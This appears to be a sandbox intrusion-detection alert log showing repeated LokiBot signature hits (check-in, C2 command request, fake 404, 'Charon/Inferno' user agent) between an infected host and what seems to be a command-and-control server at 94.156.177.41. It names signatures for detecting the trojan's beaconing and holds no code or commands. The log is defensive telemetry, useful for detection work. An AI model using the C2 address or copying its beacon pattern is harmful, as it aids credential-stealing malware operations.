                                                2024-11-20T10:12:26.119853+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922294.156.177.4180TCP
                                                2024-11-20T10:12:26.119853+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922294.156.177.4180TCP
                                                2024-11-20T10:12:26.125401+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249222TCP
                                                2024-11-20T10:12:26.273860+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922394.156.177.4180TCP
                                                2024-11-20T10:12:26.273860+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922394.156.177.4180TCP
                                                2024-11-20T10:12:26.273860+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922394.156.177.4180TCP
                                                2024-11-20T10:12:27.018600+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922394.156.177.4180TCP
                                                2024-11-20T10:12:27.018600+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922394.156.177.4180TCP
                                                2024-11-20T10:12:27.026766+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249223TCP
                                                2024-11-20T10:12:27.165072+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922494.156.177.4180TCP
                                                2024-11-20T10:12:27.165072+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922494.156.177.4180TCP
                                                2024-11-20T10:12:27.165072+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922494.156.177.4180TCP
                                                2024-11-20T10:12:27.971248+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922494.156.177.4180TCP
                                                2024-11-20T10:12:27.971248+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922494.156.177.4180TCP
                                                2024-11-20T10:12:27.977194+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249224TCP
                                                2024-11-20T10:12:28.110543+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922594.156.177.4180TCP
                                                2024-11-20T10:12:28.110543+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922594.156.177.4180TCP
                                                2024-11-20T10:12:28.110543+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922594.156.177.4180TCP
                                                2024-11-20T10:12:28.855102+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922594.156.177.4180TCP
                                                2024-11-20T10:12:28.855102+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922594.156.177.4180TCP
                                                2024-11-20T10:12:28.862681+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249225TCP
                                                2024-11-20T10:12:28.999728+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922694.156.177.4180TCP
                                                2024-11-20T10:12:28.999728+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922694.156.177.4180TCP
                                                2024-11-20T10:12:28.999728+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922694.156.177.4180TCP
                                                2024-11-20T10:12:29.827691+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922694.156.177.4180TCP
                                                2024-11-20T10:12:29.827691+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922694.156.177.4180TCP
                                                2024-11-20T10:12:29.833483+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249226TCP
                                                2024-11-20T10:12:29.966426+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922794.156.177.4180TCP
                                                2024-11-20T10:12:29.966426+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922794.156.177.4180TCP
                                                2024-11-20T10:12:29.966426+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922794.156.177.4180TCP
                                                2024-11-20T10:12:30.830951+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922794.156.177.4180TCP
                                                2024-11-20T10:12:30.830951+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922794.156.177.4180TCP
                                                2024-11-20T10:12:30.836788+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249227TCP
                                                2024-11-20T10:12:30.982470+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922894.156.177.4180TCP
                                                2024-11-20T10:12:30.982470+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922894.156.177.4180TCP
                                                2024-11-20T10:12:30.982470+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922894.156.177.4180TCP
                                                2024-11-20T10:12:31.861416+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922894.156.177.4180TCP
                                                2024-11-20T10:12:31.861416+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922894.156.177.4180TCP
                                                2024-11-20T10:12:31.866393+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249228TCP
                                                2024-11-20T10:12:32.023731+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922994.156.177.4180TCP
                                                2024-11-20T10:12:32.023731+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922994.156.177.4180TCP
                                                2024-11-20T10:12:32.023731+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922994.156.177.4180TCP
                                                2024-11-20T10:12:32.777327+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922994.156.177.4180TCP
                                                2024-11-20T10:12:32.777327+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922994.156.177.4180TCP
                                                2024-11-20T10:12:32.804698+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249229TCP
                                                2024-11-20T10:12:32.972572+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923094.156.177.4180TCP
                                                2024-11-20T10:12:32.972572+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923094.156.177.4180TCP
                                                2024-11-20T10:12:32.972572+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923094.156.177.4180TCP
                                                2024-11-20T10:12:33.728123+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923094.156.177.4180TCP
                                                2024-11-20T10:12:33.728123+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923094.156.177.4180TCP
                                                2024-11-20T10:12:33.734312+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249230TCP
                                                2024-11-20T10:12:33.892076+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923194.156.177.4180TCP
                                                2024-11-20T10:12:33.892076+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923194.156.177.4180TCP
                                                2024-11-20T10:12:33.892076+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923194.156.177.4180TCP
                                                2024-11-20T10:12:34.632717+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923194.156.177.4180TCP
                                                2024-11-20T10:12:34.632717+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923194.156.177.4180TCP
                                                2024-11-20T10:12:34.652151+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249231TCP
                                                2024-11-20T10:12:34.777104+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923294.156.177.4180TCP
                                                2024-11-20T10:12:34.777104+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923294.156.177.4180TCP
                                                2024-11-20T10:12:34.777104+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923294.156.177.4180TCP
                                                2024-11-20T10:12:35.505221+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923294.156.177.4180TCP
                                                2024-11-20T10:12:35.505221+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923294.156.177.4180TCP
                                                2024-11-20T10:12:35.510221+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249232TCP
                                                2024-11-20T10:12:35.645216+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923394.156.177.4180TCP
                                                2024-11-20T10:12:35.645216+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923394.156.177.4180TCP
                                                2024-11-20T10:12:35.645216+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923394.156.177.4180TCP
                                                2024-11-20T10:12:36.376039+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923394.156.177.4180TCP
                                                2024-11-20T10:12:36.376039+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923394.156.177.4180TCP
                                                2024-11-20T10:12:36.382089+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249233TCP
                                                2024-11-20T10:12:36.520686+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923494.156.177.4180TCP
                                                2024-11-20T10:12:36.520686+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923494.156.177.4180TCP
                                                2024-11-20T10:12:36.520686+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923494.156.177.4180TCP
                                                2024-11-20T10:12:37.246761+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923494.156.177.4180TCP
                                                2024-11-20T10:12:37.246761+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923494.156.177.4180TCP
                                                2024-11-20T10:12:37.254017+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249234TCP
                                                2024-11-20T10:12:37.391332+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923594.156.177.4180TCP
                                                2024-11-20T10:12:37.391332+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923594.156.177.4180TCP
                                                2024-11-20T10:12:37.391332+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923594.156.177.4180TCP
                                                2024-11-20T10:12:38.148405+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923594.156.177.4180TCP
                                                2024-11-20T10:12:38.148405+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923594.156.177.4180TCP
                                                2024-11-20T10:12:38.156608+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249235TCP
                                                2024-11-20T10:12:38.295670+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923694.156.177.4180TCP
                                                2024-11-20T10:12:38.295670+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923694.156.177.4180TCP
                                                2024-11-20T10:12:38.295670+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923694.156.177.4180TCP
                                                2024-11-20T10:12:39.034887+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923694.156.177.4180TCP
                                                2024-11-20T10:12:39.034887+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923694.156.177.4180TCP
                                                2024-11-20T10:12:39.040738+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249236TCP
                                                2024-11-20T10:12:39.189869+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923794.156.177.4180TCP
                                                2024-11-20T10:12:39.189869+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923794.156.177.4180TCP
                                                2024-11-20T10:12:39.189869+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923794.156.177.4180TCP
                                                2024-11-20T10:12:40.082470+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923794.156.177.4180TCP
                                                2024-11-20T10:12:40.082470+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923794.156.177.4180TCP
                                                2024-11-20T10:12:40.087453+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249237TCP
                                                2024-11-20T10:12:40.238221+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923894.156.177.4180TCP
                                                2024-11-20T10:12:40.238221+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923894.156.177.4180TCP
                                                2024-11-20T10:12:40.238221+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923894.156.177.4180TCP
                                                2024-11-20T10:12:40.998967+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923894.156.177.4180TCP
                                                2024-11-20T10:12:40.998967+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923894.156.177.4180TCP
                                                2024-11-20T10:12:41.006067+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249238TCP
                                                2024-11-20T10:12:41.149834+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923994.156.177.4180TCP
                                                2024-11-20T10:12:41.149834+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923994.156.177.4180TCP
                                                2024-11-20T10:12:41.149834+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923994.156.177.4180TCP
                                                2024-11-20T10:12:41.926270+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923994.156.177.4180TCP
                                                2024-11-20T10:12:41.926270+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923994.156.177.4180TCP
                                                2024-11-20T10:12:41.933396+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249239TCP
                                                2024-11-20T10:12:42.075089+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924094.156.177.4180TCP
                                                2024-11-20T10:12:42.075089+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924094.156.177.4180TCP
                                                2024-11-20T10:12:42.075089+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924094.156.177.4180TCP
                                                2024-11-20T10:12:42.940058+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924094.156.177.4180TCP
                                                2024-11-20T10:12:42.940058+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924094.156.177.4180TCP
                                                2024-11-20T10:12:42.947066+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249240TCP
                                                2024-11-20T10:12:43.090775+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924194.156.177.4180TCP
                                                2024-11-20T10:12:43.090775+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924194.156.177.4180TCP
                                                2024-11-20T10:12:43.090775+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924194.156.177.4180TCP
                                                2024-11-20T10:12:43.960547+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924194.156.177.4180TCP
                                                2024-11-20T10:12:43.960547+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924194.156.177.4180TCP
                                                2024-11-20T10:12:43.965760+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249241TCP
                                                2024-11-20T10:12:44.335023+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924294.156.177.4180TCP
                                                2024-11-20T10:12:44.335023+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924294.156.177.4180TCP
                                                2024-11-20T10:12:44.335023+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924294.156.177.4180TCP
                                                2024-11-20T10:12:45.163042+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924294.156.177.4180TCP
                                                2024-11-20T10:12:45.163042+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924294.156.177.4180TCP
                                                2024-11-20T10:12:45.167988+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249242TCP
                                                2024-11-20T10:12:45.306056+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924394.156.177.4180TCP
                                                2024-11-20T10:12:45.306056+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924394.156.177.4180TCP
                                                2024-11-20T10:12:45.306056+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924394.156.177.4180TCP
                                                2024-11-20T10:12:46.061782+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924394.156.177.4180TCP
                                                2024-11-20T10:12:46.061782+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924394.156.177.4180TCP
                                                2024-11-20T10:12:46.066783+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249243TCP
                                                2024-11-20T10:12:46.228751+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924494.156.177.4180TCP
                                                2024-11-20T10:12:46.228751+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924494.156.177.4180TCP
                                                2024-11-20T10:12:46.228751+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924494.156.177.4180TCP
                                                2024-11-20T10:12:46.952281+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924494.156.177.4180TCP
                                                2024-11-20T10:12:46.952281+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924494.156.177.4180TCP
                                                2024-11-20T10:12:46.968414+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249244TCP
                                                2024-11-20T10:12:47.301018+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924594.156.177.4180TCP
                                                2024-11-20T10:12:47.301018+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924594.156.177.4180TCP
                                                2024-11-20T10:12:47.301018+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924594.156.177.4180TCP
                                                2024-11-20T10:12:48.035363+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924594.156.177.4180TCP
                                                2024-11-20T10:12:48.035363+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924594.156.177.4180TCP
                                                2024-11-20T10:12:48.042569+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249245TCP
                                                2024-11-20T10:12:48.198489+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924694.156.177.4180TCP
                                                2024-11-20T10:12:48.198489+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924694.156.177.4180TCP
                                                2024-11-20T10:12:48.198489+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924694.156.177.4180TCP
                                                2024-11-20T10:12:48.943612+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924694.156.177.4180TCP
                                                2024-11-20T10:12:48.943612+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924694.156.177.4180TCP
                                                2024-11-20T10:12:48.948748+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249246TCP
                                                2024-11-20T10:12:49.104815+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924794.156.177.4180TCP
                                                2024-11-20T10:12:49.104815+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924794.156.177.4180TCP
                                                2024-11-20T10:12:49.104815+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924794.156.177.4180TCP
                                                2024-11-20T10:12:50.033391+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924794.156.177.4180TCP
                                                2024-11-20T10:12:50.033391+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924794.156.177.4180TCP
                                                2024-11-20T10:12:50.039447+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249247TCP
                                                2024-11-20T10:12:50.259999+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924894.156.177.4180TCP
                                                2024-11-20T10:12:50.259999+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924894.156.177.4180TCP
                                                2024-11-20T10:12:50.259999+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924894.156.177.4180TCP
                                                2024-11-20T10:12:50.995621+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924894.156.177.4180TCP
                                                2024-11-20T10:12:50.995621+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924894.156.177.4180TCP
                                                2024-11-20T10:12:51.002482+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249248TCP
                                                2024-11-20T10:12:51.135098+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924994.156.177.4180TCP
                                                2024-11-20T10:12:51.135098+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924994.156.177.4180TCP
                                                2024-11-20T10:12:51.135098+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924994.156.177.4180TCP
                                                2024-11-20T10:12:51.871431+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924994.156.177.4180TCP
                                                2024-11-20T10:12:51.871431+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924994.156.177.4180TCP
                                                2024-11-20T10:12:51.895820+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249249TCP
                                                2024-11-20T10:12:52.064243+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925094.156.177.4180TCP
                                                2024-11-20T10:12:52.064243+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925094.156.177.4180TCP
                                                2024-11-20T10:12:52.064243+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925094.156.177.4180TCP
                                                2024-11-20T10:12:52.935942+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925094.156.177.4180TCP
                                                2024-11-20T10:12:52.935942+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925094.156.177.4180TCP
                                                2024-11-20T10:12:52.945428+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249250TCP
                                                2024-11-20T10:12:53.190103+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925194.156.177.4180TCP
                                                2024-11-20T10:12:53.190103+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925194.156.177.4180TCP
                                                2024-11-20T10:12:53.190103+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925194.156.177.4180TCP
                                                2024-11-20T10:12:54.054313+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925194.156.177.4180TCP
                                                2024-11-20T10:12:54.054313+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925194.156.177.4180TCP
                                                2024-11-20T10:12:54.059285+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249251TCP
                                                2024-11-20T10:12:54.198386+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925294.156.177.4180TCP
                                                2024-11-20T10:12:54.198386+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925294.156.177.4180TCP
                                                2024-11-20T10:12:54.198386+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925294.156.177.4180TCP
                                                2024-11-20T10:12:55.068247+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925294.156.177.4180TCP
                                                2024-11-20T10:12:55.068247+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925294.156.177.4180TCP
                                                2024-11-20T10:12:55.073293+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249252TCP
                                                2024-11-20T10:12:55.205372+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925394.156.177.4180TCP
                                                2024-11-20T10:12:55.205372+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925394.156.177.4180TCP
                                                2024-11-20T10:12:55.205372+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925394.156.177.4180TCP
                                                2024-11-20T10:12:55.953617+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925394.156.177.4180TCP
                                                2024-11-20T10:12:55.953617+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925394.156.177.4180TCP
                                                2024-11-20T10:12:55.961425+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249253TCP
                                                2024-11-20T10:12:56.120814+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925494.156.177.4180TCP
                                                2024-11-20T10:12:56.120814+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925494.156.177.4180TCP
                                                2024-11-20T10:12:56.120814+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925494.156.177.4180TCP
                                                2024-11-20T10:12:56.843900+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925494.156.177.4180TCP
                                                2024-11-20T10:12:56.843900+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925494.156.177.4180TCP
                                                2024-11-20T10:12:56.849610+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249254TCP
                                                2024-11-20T10:12:57.001731+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925594.156.177.4180TCP
                                                2024-11-20T10:12:57.001731+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925594.156.177.4180TCP
                                                2024-11-20T10:12:57.001731+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925594.156.177.4180TCP
                                                2024-11-20T10:12:57.763167+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925594.156.177.4180TCP
                                                2024-11-20T10:12:57.763167+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925594.156.177.4180TCP
                                                2024-11-20T10:12:57.768461+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249255TCP
                                                2024-11-20T10:12:57.910682+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925694.156.177.4180TCP
                                                2024-11-20T10:12:57.910682+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925694.156.177.4180TCP
                                                2024-11-20T10:12:57.910682+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925694.156.177.4180TCP
                                                2024-11-20T10:12:58.781339+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925694.156.177.4180TCP
                                                2024-11-20T10:12:58.781339+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925694.156.177.4180TCP
                                                2024-11-20T10:12:58.804070+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249256TCP
                                                2024-11-20T10:12:58.994068+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925794.156.177.4180TCP
                                                2024-11-20T10:12:58.994068+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925794.156.177.4180TCP
                                                2024-11-20T10:12:58.994068+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925794.156.177.4180TCP
                                                2024-11-20T10:12:59.717917+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925794.156.177.4180TCP
                                                2024-11-20T10:12:59.717917+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925794.156.177.4180TCP
                                                2024-11-20T10:12:59.724299+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249257TCP
                                                2024-11-20T10:12:59.856695+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925894.156.177.4180TCP
                                                2024-11-20T10:12:59.856695+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925894.156.177.4180TCP
                                                2024-11-20T10:12:59.856695+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925894.156.177.4180TCP
                                                2024-11-20T10:13:00.715397+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925894.156.177.4180TCP
                                                2024-11-20T10:13:00.715397+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925894.156.177.4180TCP
                                                2024-11-20T10:13:00.720255+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249258TCP
                                                2024-11-20T10:13:00.859620+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925994.156.177.4180TCP
                                                2024-11-20T10:13:00.859620+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925994.156.177.4180TCP
                                                2024-11-20T10:13:00.859620+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925994.156.177.4180TCP
                                                2024-11-20T10:13:01.604317+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925994.156.177.4180TCP
                                                2024-11-20T10:13:01.604317+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925994.156.177.4180TCP
                                                2024-11-20T10:13:01.618232+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249259TCP
                                                2024-11-20T10:13:01.807106+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224926094.156.177.4180TCP
